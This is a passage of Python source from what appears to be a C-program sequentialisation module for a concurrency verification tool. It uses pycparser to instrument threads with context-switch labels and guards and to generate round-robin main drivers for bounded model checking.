self.visit(n.bitsize)\n if n.init:\n s += ' = ' + self._visit_expr(n.init)\n return s\n\n def _generate_struct_union(self, n, name):\n \"\"\" Generates code for structs and unions. name should be either\n 'struct' or union.\n \"\"\"\n s = name + ' ' + (n.name or '')\n # There should be no anonymous struct, handling in workarounds module\n self.__visiting_struct = True\n if n.name:\n self.__struct_stack.append(n.name)\n if n.decls:\n s += '\\n'\n s += self._make_indent()\n self.indent_level += 2\n s += '{\\n'\n for decl in n.decls:\n s += self._generate_stmt(decl)\n self.indent_level -= 2\n s += self._make_indent() + '}'\n self.__visiting_struct = False\n self.__struct_stack.pop()\n return s\n\n\n def visit_Compound(self, n):\n s = self._make_indent() + '{\\n'\n self.indent_level += 1\n\n # Insert the labels at the beginning of each statement,\n # with a few exclusions to reduce context-switch points...\n #\n if n.block_items:\n for stmt in n.block_items:\n # Case 1: last statement in a thread (must correspond to last label)\n if type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == core.common.changeID['pthread_exit']: ##if type(stmt) == pycparser.c_ast.FuncCall and self._parenthesize_unless_simple(stmt.name) == core.common.changeID['pthread_exit']:\n self.__stmtCount += 1\n self.__maxInCompound = self.__stmtCount\n stamp = '__CSEQ_rawline(\"%s%s_%s: \");\\n' % (self.__startChar, self.__currentThread, str(self.__stmtCount))\n code = self.visit(stmt)\n newStmt = stamp + code + ';\\n'\n s += newStmt\n # Case 2: labels\n elif (type(stmt) in (pycparser.c_ast.Label,)):\n # --1-- Simulate a visit to the stmt block to see whether it makes any use of pointers or shared memory.\n #\n globalAccess = self.__globalAccess(stmt)\n newStmt = ''\n # --2-- Now rebuilds the stmt block again,\n # this time using the proper formatting\n # (now we know if the statement is accessing global memory,\n # so to insert the stamp at the beginning when needed)\n #\n if not self.__atomic and self.__stmtCount == -1: # first statement in a thread\n self.__stmtCount += 1\n self.__maxInCompound = self.__stmtCount\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n stamp = '__CSEQ_rawline(\"IF(%s,%s,%s%s_%s)\");\\n' % (threadIndex,str(self.__stmtCount), self.__startChar, self.__currentThread, str(self.__stmtCount+1))\n code = self.visit(stmt.stmt)\n newStmt = stamp + code + ';\\n'\n elif (not self.__visit_funcReference and (\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == '__CSEQ_atomic_begin') or\n (not self.__atomic and\n (globalAccess or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == core.common.changeID['pthread_create']) or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == core.common.changeID['pthread_join']) or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name.startswith('__CSEQ_atomic') and not stmt.name.name == '__CSEQ_atomic_end') or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name.startswith('__CSEQ_assume')) or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == '__cs_cond_wait_2')\n )\n )\n )):\n self.__stmtCount += 1\n self.__maxInCompound = self.__stmtCount\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n stamp = '__CSEQ_rawline(\"%s%s_%s: IF(%s,%s,%s%s_%s)\");\\n' % (self.__startChar, self.__currentThread, str(self.__stmtCount),threadIndex,str(self.__stmtCount), self.__startChar, self.__currentThread, str(self.__stmtCount+1))\n newStmt = stamp + self.visit(stmt.stmt) + ';\\n'\n else:\n newStmt = self.visit(stmt.stmt) + ';\\n'\n\n # GUARD(%s,%s)\n guard = ''\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n if not self.__atomic:\n if self.__decomposepc:\n guard = '__CSEQ_assume( __cs_pc_cs_%s >= %s );\\n' % (threadIndex,self.__stmtCount+1)\n elif self.__one_pc_cs:\n guard = '__CSEQ_assume( __cs_pc_cs >= %s );\\n' % (self.__stmtCount+1)\n else:\n guard = '__CSEQ_assume( __cs_pc_cs[%s] >= %s );\\n' % (threadIndex,self.__stmtCount+1)\n\n newStmt = self._make_indent()+ stmt.name + ': ' + guard + newStmt+ '\\n'\n\n s += newStmt\n # Case 3: all the rest....\n elif (type(stmt) not in (pycparser.c_ast.Compound, pycparser.c_ast.Goto, pycparser.c_ast.Decl)\n and not (self.__currentThread=='main' and self.__firstThreadCreate == False) or (self.__currentThread=='main' and self.__stmtCount == -1)) :\n\n # --1-- Simulate a visit to the stmt block to see whether it makes any use of pointers or shared memory.\n #\n globalAccess = self.__globalAccess(stmt)\n newStmt = ''\n\n self.lines = [] # override core.module marking behaviour, otherwise module.visit() won't insert any marker\n\n # --2-- Now rebuilds the stmt block again,\n # this time using the proper formatting\n # (now we know if the statement is accessing global memory,\n # so to insert the stamp at the beginning when needed)\n #\n if not self.__atomic and self.__stmtCount == -1: # first statement in a thread\n self.__stmtCount += 1\n self.__maxInCompound = self.__stmtCount\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n stamp = '__CSEQ_rawline(\"IF(%s,%s,%s%s_%s)\");\\n' % (threadIndex,str(self.__stmtCount), self.__startChar, self.__currentThread, str(self.__stmtCount+1))\n code = self.visit(stmt)\n newStmt = stamp + code + ';\\n'\n elif (not self.__visit_funcReference and (\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == '__CSEQ_atomic_begin') or\n (not self.__atomic and\n (globalAccess or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == core.common.changeID['pthread_create']) or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == core.common.changeID['pthread_join']) or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name.startswith('__CSEQ_atomic') and not stmt.name.name == '__CSEQ_atomic_end') or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name.startswith('__CSEQ_assume')) or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == '__cs_cond_wait_2')\n )\n )\n )):\n self.__stmtCount += 1\n self.__maxInCompound = self.__stmtCount\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n stamp = '__CSEQ_rawline(\"%s%s_%s: IF(%s,%s,%s%s_%s)\");\\n' % (self.__startChar, self.__currentThread, str(self.__stmtCount),threadIndex,str(self.__stmtCount), self.__startChar, self.__currentThread, str(self.__stmtCount+1))\n code = self.visit(stmt)\n newStmt = stamp + code + ';\\n'\n else:\n newStmt = self.visit(stmt) + \";\\n\"\n\n s += newStmt\n else:\n newStmt = self.visit(stmt) + \";\\n\"\n s += newStmt\n\n self.indent_level -= 1\n s += self._make_indent() + '}\\n'\n\n return s\n\n\n def visit_FuncDef(self, n):\n if (n.decl.name.startswith('__CSEQ_atomic_') or\n #n.decl.name.startswith(core.common.funcPrefixChange['__CSEQ_atomic']) or\n n.decl.name == '__CSEQ_assert' or\n n.decl.name in self.Parser.funcReferenced ): # <--- functions called through pointers are not inlined yet\n # return self.Parser.funcBlock[n.decl.name]\n self.__currentThread = n.decl.name\n self.__visit_funcReference = True\n #ret = self.otherparser.visit(n)\n oldatomic = self.__atomic\n self.__atomic = True\n decl = self.visit(n.decl)\n body = self.visit(n.body)\n self.__atomic = oldatomic\n s = decl + '\\n' + body + '\\n'\n self.__currentThread = ''\n self.__visit_funcReference = False\n return s\n\n self.__first = False\n self.__currentThread = n.decl.name\n self.__firstThreadCreate = False\n\n decl = self.visit(n.decl)\n self.indent_level = 0\n body = self.visit(n.body)\n\n f = ''\n\n self.__lines[self.__currentThread] = self.__stmtCount\n ###print \"THREAD %s, LINES %s \\n\\n\" % (self.__currentThread, self.__lines)\n\n #\n if n.param_decls:\n knrdecls = ';\\n'.join(self.visit(p) for p in n.param_decls)\n self.__stmtCount = -1\n #body = body[:body.rfind('}')] + self._make_indent() + returnStmt + '\\n}'\n f = decl + '\\n' + knrdecls + ';\\n'\n else:\n self.__stmtCount = -1\n #body = body[:body.rfind('}')] + self._make_indent() + returnStmt + '\\n}'\n f = decl + '\\n'\n\n # Remove arguments (if any) for main() and transform them into local variables in main_thread.\n # TODO re-implement seriously.\n if self.__currentThread == 'main':\n f = '%s main_thread(void)\\n' % self.Parser.funcBlockOut[\n self.__currentThread]\n main_args = self.Parser.funcBlockIn['main']\n args = ''\n if main_args.find('void') != -1 or main_args == '':\n main_args = ''\n else:\n main_args = re.sub(r'\\*(.*)\\[\\]', r'** \\1', main_args)\n main_args = re.sub(r'(.*)\\[\\]\\[\\]', r'** \\1', main_args)\n # split argument\n main_args = main_args.split(',')\n if len(main_args) != 2:\n self.warn('main function may have been defined incorrectly, %s' % main_args)\n # args = 'static ' + main_args[0] + '= %s; ' % self.__argc\n # args = 'static ' + main_args[0] + '; ' # Disable this for SVCOMP\n args = main_args[0] + '; '\n # argv = self.__argv.split(' ')\n # argv = '{' + ','.join(['\\\"%s\\\"' % v for v in argv]) + '}'\n # args += 'static ' + main_args[1] + '= %s;' % argv\n # args += 'static ' + main_args[1] + ';' # Disable this for SVCOMP\n args += main_args[1] + ';'\n body = '{' + args + body[body.find('{') + 1:]\n\n f += body + '\\n'\n\n self.__currentThread = ''\n\n return f + '\\n\\n'\n\n\n def visit_If(self, n):\n ifStart = self.__maxInCompound # label where the if stmt begins\n\n s = 'if ('\n\n if n.cond:\n condition = self.visit(n.cond)\n s += condition\n\n s += ')\\n'\n s += self._generate_stmt(n.iftrue, add_indent=True)\n\n ifEnd = self.__maxInCompound # label for the last stmt in the if block: if () { block; }\n nextLabelID = ifEnd+1\n\n if n.iffalse:\n elseBlock = self._generate_stmt(n.iffalse, add_indent=True)\n\n elseEnd = self.__maxInCompound # label for the last stmt in the if_false block if () {...} else { block; }\n\n if ifStart < ifEnd:\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n # GUARD(%s,%s)\n if not self.__visit_funcReference:\n if self.__decomposepc:\n elseHeader = '__CSEQ_assume( __cs_pc_cs_%s >= %s );' % (threadIndex, str(ifEnd+1))\n elif self.__one_pc_cs:\n elseHeader = '__CSEQ_assume( __cs_pc_cs >= %s );' % (str(ifEnd+1))\n else:\n elseHeader = '__CSEQ_assume( __cs_pc_cs[%s] >= %s );' % (threadIndex, str(ifEnd+1))\n else:\n elseHeader = ''\n\n nextLabelID = elseEnd+1\n s += self._make_indent() + 'else\\n'\n\n elseBlock = elseBlock.replace('{', '{ '+elseHeader, 1)\n s += elseBlock\n\n header = ''\n\n if ifStart+1 < nextLabelID:\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n # GUARD(%s,%s)\n if not self.__visit_funcReference:\n if self.__decomposepc:\n footer = '__CSEQ_assume( __cs_pc_cs_%s >= %s );' % (threadIndex, nextLabelID)\n elif self.__one_pc_cs:\n footer = '__CSEQ_assume( __cs_pc_cs >= %s );' % (nextLabelID)\n else:\n footer = '__CSEQ_assume( __cs_pc_cs[%s] >= %s );' % (threadIndex, nextLabelID)\n else:\n footer = ''\n\n '''\n if n.iffalse:\n header = 'ASS_ELSE(%s, %s, %s)' % (condition, ifEnd+1, elseEnd+1) + '\\n' + self._make_indent()\n else:\n if ifEnd > ifStart:\n header = 'ASS_THEN(%s, %s)' % (condition, ifEnd+1) + '\\n' + self._make_indent()\n else: header = ''\n '''\n\n return header + s + self._make_indent() + footer\n\n\n def visit_Return(self, n):\n if self.__currentThread != '__CSEQ_assert' and self.__currentThread not in self.Parser.funcReferenced and not self.__atomic:\n self.error(\"error: %s: return statement in thread '%s'.\\n\" % (self.getname(), self.__currentThread))\n\n s = 'return'\n if n.expr: s += ' ' + self.visit(n.expr)\n return s + ';'\n\n\n def visit_Label(self, n):\n self.__labelLine[self.__currentThread, n.name] = self.__stmtCount\n return n.name + ':\\n' + self._generate_stmt(n.stmt)\n\n\n def visit_Goto(self, n):\n self.__gotoLine[self.__currentThread, n.name] = self.__stmtCount\n extra = '<%s,%s>\\n' % (self.__currentThread, n.name) + self._make_indent()\n extra = ''\n return extra + 'goto ' + n.name + ';'\n\n def visit_ArrayRef(self, n):\n arrref = self._parenthesize_unless_simple(n.name)\n subscript = self.visit(n.subscript)\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n if subscript == '__cs_thread_index' and self.__currentThread != '':\n subscript = '%s' % threadIndex\n s = arrref + '[' + subscript + ']'\n return s\n\n def visit_ID(self, n):\n # If this ID corresponds either to a global variable,\n # or to a pointer...\n #\n if ((self.__isGlobal(self.__currentThread, n.name) or self.__isPointer(self.__currentThread, n.name)) and not\n n.name.startswith('__cs_thread_local_')):\n #print \"variable %s in %s is global\\n\" % (n.name, self.__currentThread)\n self.__globalMemoryAccessed = True\n\n # Rename the IDs of main() arguments\n #if self.__currentThread == 'main' and n.name in self.Parser.varNames['main'] and self.Parser.varKind['main',n.name] == 'p':\n # return '__main_params_' + n.name\n\n return n.name\n\n\n def visit_FuncCall(self, n):\n fref = self._parenthesize_unless_simple(n.name)\n args = self.visit(n.args)\n\n if fref == '__CSEQ_atomic_begin':\n if not self.__visit_funcReference:\n self.__atomic = True\n return ''\n elif fref == '__CSEQ_atomic_end':\n if not self.__visit_funcReference:\n self.__atomic = False\n return ''\n elif fref.startswith('__CSEQ_atomic_'): self.__globalMemoryAccessed = True\n elif fref == core.common.changeID['pthread_cond_wait']:\n self.error('pthread_cond_wait in input code (use conditional wait converter module first)')\n\n\n # When a thread is created, extract its function name\n # based on the 3rd parameter in the pthread_create() call:\n #\n # pthread_create(&id, NULL, f, &arg);\n # ^^^\n #\n if fref == core.common.changeID['pthread_create']: # TODO re-write AST-based (see other modules)\n fName = args[:args.rfind(',')]\n fName = fName[fName.rfind(',')+2:]\n fName = fName.replace('&', '')\n\n ##print \"checking fName = %s\\n\\n\" % fName\n\n if fName not in self.__threadName:\n self.__threadName.append(fName)\n self.__threadCount = self.__threadCount + 1\n\n args = args + ', %s' % (self.__threadCount)\n self.__threadIndex[fName] = self.__threadCount\n else:\n # when visiting from the 2nd time on (if it happens),\n # reuse the old thread indexS!\n args = args + ', %s' % (self.__threadIndex[fName])\n\n self.__firstThreadCreate = True\n\n if fref == core.common.changeID['pthread_exit']:\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n return fref + '(' + args + ', %s)' % threadIndex\n\n '''\n Avoid using pointers to handle mutexes\n by changing the function calls,\n there are two cases:\n\n pthread_mutex_lock(&l) -> __cs_mutex_lock(l)\n pthread_mutex_lock(ptr) -> __cs_mutex_lock(*ptr)\n\n TODO:\n this needs proper implementation,\n one should check that the argument is not referenced\n elsewhere (otherwise this optimisation will not work)\n '''\n\n # Optimization for removing __cs_thread_index variable from global scope\n if ((fref == core.common.changeID['pthread_mutex_lock'] ) or (fref == core.common.changeID['pthread_mutex_unlock']) or\n fref.startswith('__cs_cond_wait_')):\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n return fref + '(' + args + ', %s)' % threadIndex\n\n return fref + '(' + args + ')'\n\n ########################################################################################\n ########################################################################################\n ########################################################################################\n ########################################################################################\n ########################################################################################\n ########################################################################################\n\n def __createMainRoundRobinDecomposePC(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' Part I:\n Pre-guessed jump lengths have a size in bits depending on the size of the thread.\n '''\n for r in range(0, ROUNDS):\n for t in range(0,self.__threadbound+1):\n threadsize = self.__lines[self.__threadName[t]]\n k = int(math.floor(math.log(threadsize,2)))+1\n self._bitwidth['main','__cs_tmp_t%s_r%s' % (t,r)] = k\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r0 %s;\\n\" % self.__extra_nondet\n main +=\" __CSEQ_assume(__cs_tmp_t0_r0 > 0);\\n\"\n main +=\" __cs_pc_cs_0 = __cs_tmp_t0_r0;\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs_0 <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc_0 = __cs_pc_cs_0;\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r0 %s;\\n\" % (i, self.__extra_nondet)\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs_%s = __cs_tmp_t%s_r0;\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc_%s = __cs_pc_cs_%s;\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (round, self.__extra_nondet)\n main +=\" if (__cs_active_thread[0]) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs_0 = __cs_tmp_t0_r%s;\\n\" % (round)\n else:\n main +=\" __cs_pc_cs_0 = __cs_pc_0 + __cs_tmp_t0_r%s;\\n\" % (round)\n main +=\" __CSEQ_assume(__cs_pc_cs_0 >= __cs_pc_0);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs_0 <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc_0 = __cs_pc_cs_0;\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r%s %s;\\n\" % (i, round, self.__extra_nondet)\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs_%s = __cs_tmp_t%s_r%s;\\n\" % (i, i, round)\n else:\n main +=\" __cs_pc_cs_%s = __cs_pc_%s + __cs_tmp_t%s_r%s;\\n\" % (i, i, i, round)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s >= __cs_pc_%s);\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc_%s = __cs_pc_cs_%s;\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n k = int(math.floor(math.log(self.__lines['main'],2)))+1\n main += \" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (ROUNDS, self.__extra_nondet)\n self._bitwidth['main','__cs_tmp_t0_r%s' % (ROUNDS)] = k\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs_0 = __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n else:\n main +=\" __cs_pc_cs_0 = __cs_pc_0 + __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n main +=\" __CSEQ_assume(__cs_pc_cs_0 >= __cs_pc_0);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs_0 <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n def __createMainRoundRobinOnePCCS(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' Part I:\n Pre-guessed jump lengths have a size in bits depending on the size of the thread.\n '''\n\n maxsize = 0\n for t in self.__lines:\n maxsize = max(maxsize, int(self.__lines[t]))\n k = int(math.floor(math.log(maxsize,2)))+1\n\n for r in range(0, ROUNDS):\n for t in range(0,self.__threadbound+1):\n # threadsize = self.__lines[self.__threadName[t]]\n # k = int(math.floor(math.log(threadsize,2)))+1\n self._bitwidth['main','__cs_tmp_t%s_r%s' % (t,r)] = k\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r0;\\n\"\n main +=\" __CSEQ_assume(__cs_tmp_t0_r0 > 0);\\n\"\n main +=\" __cs_pc_cs = __cs_tmp_t0_r0;\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs;\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r0;\\n\" % (i)\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs = __cs_tmp_t%s_r0;\\n\" % (i)\n main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc[%s] = __cs_pc_cs;\\n\" % (i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r%s;\\n\" % (round)\n main +=\" if (__cs_active_thread[0]) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs = __cs_tmp_t0_r%s;\\n\" % (round)\n else:\n main +=\" __cs_pc_cs = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (round)\n main +=\" __CSEQ_assume(__cs_pc_cs >= __cs_pc[0]);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs;\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r%s;\\n\" % (i, round)\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs = __cs_tmp_t%s_r%s;\\n\" % (i, round)\n else:\n main +=\" __cs_pc_cs = __cs_pc[%s] + __cs_tmp_t%s_r%s;\\n\" % (i, i, round)\n main +=\" __CSEQ_assume(__cs_pc_cs >= __cs_pc[%s]);\\n\" % (i)\n main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc[%s] = __cs_pc_cs;\\n\" % (i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n # k = int(math.floor(math.log(self.__lines['main'],2)))+1\n main += \" unsigned int __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n self._bitwidth['main','__cs_tmp_t0_r%s' % (ROUNDS)] = k\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs = __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n else:\n main +=\" __cs_pc_cs = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n main +=\" __CSEQ_assume(__cs_pc_cs >= __cs_pc_0);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n def __createMainDecomposePC(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' Part I:\n Pre-guessed jump lengths have a size in bits depending on the size of the thread.\n '''\n for r in range(0, ROUNDS):\n for t in range(0,self.__threadbound+1):\n threadsize = self.__lines[self.__threadName[t]]\n k = int(math.floor(math.log(threadsize,2)))+1\n self._bitwidth['main','__cs_tmp_t%s_r%s' % (t,r)] = k\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r0 %s;\\n\" % self.__extra_nondet\n main +=\" __CSEQ_assume(__cs_tmp_t0_r0 > 0);\\n\"\n main +=\" __cs_pc_cs_0 = __cs_tmp_t0_r0;\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs_0 <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_last_thread = 0;\\n\"\n main +=\" __cs_pc_0 = __cs_pc_cs_0;\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r0 %s;\\n\" % (i, self.__extra_nondet)\n # main +=\" __CSEQ_assume(__cs_tmp_t%s_r0 >= 0);\\n\" % (i)\n main +=\" unsigned int __cs_run_t%s_r0 = (__cs_tmp_t%s_r0 && (__cs_active_thread[%s] == 1));\\n\" % (i, i, i)\n self._bitwidth['main','__cs_run_t%s_r0' % (i)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t%s_r0) {\\n\" % (i)\n main +=\" __cs_pc_cs_%s = __cs_tmp_t%s_r0;\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_last_thread = %s;\\n\" % (i)\n main +=\" __cs_pc_%s = __cs_pc_cs_%s;\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" __CSEQ_assume(__cs_last_thread != 0);\\n\"\n main +=\" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (round, self.__extra_nondet)\n # main +=\" __CSEQ_assume(__cs_tmp_t0_r%s >= 0);\\n\" % (round)\n main +=\" unsigned int __cs_run_t0_r%s = (__cs_tmp_t0_r%s && (__cs_active_thread[0] == 1));\\n\" % (round, round)\n self._bitwidth['main','__cs_run_t0_r%s' % (round)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t0_r%s) {\\n\" % (round)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs_0 = __cs_tmp_t0_r%s;\\n\" % (round)\n else:\n main +=\" __cs_pc_cs_0 = __cs_pc_0 + __cs_tmp_t0_r%s;\\n\" % (round)\n main +=\" __CSEQ_assume(__cs_pc_cs_0 >= __cs_pc_0);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs_0 <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_last_thread = 0;\\n\"\n main +=\" __cs_pc_0 = __cs_pc_cs_0;\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" __CSEQ_assume(__cs_last_thread != %s);\\n\" % (i)\n main +=\" unsigned int __cs_tmp_t%s_r%s %s;\\n\" % (i, round, self.__extra_nondet)\n # main +=\" __CSEQ_assume(__cs_tmp_t%s_r%s >= 0);\\n\" % (i, round)\n main +=\" unsigned int __cs_run_t%s_r%s = (__cs_tmp_t%s_r%s && (__cs_active_thread[%s] == 1));\\n\" % (i, round, i, round, i)\n self._bitwidth['main','__cs_run_t%s_r%s' % (i, round)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t%s_r%s) {\\n\" % (i, round)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs_%s = __cs_tmp_t%s_r%s;\\n\" % (i, i, round)\n else:\n main +=\" __cs_pc_cs_%s = __cs_pc_%s + __cs_tmp_t%s_r%s;\\n\" % (i, i, i, round)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s >= __cs_pc_%s);\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_last_thread = %s;\\n\" % (i)\n main +=\" __cs_pc_%s = __cs_pc_cs_%s;\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' 